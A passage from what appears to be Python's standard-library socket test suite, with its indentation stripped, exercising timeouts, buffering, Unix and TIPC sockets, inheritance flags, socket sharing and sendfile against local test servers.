self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
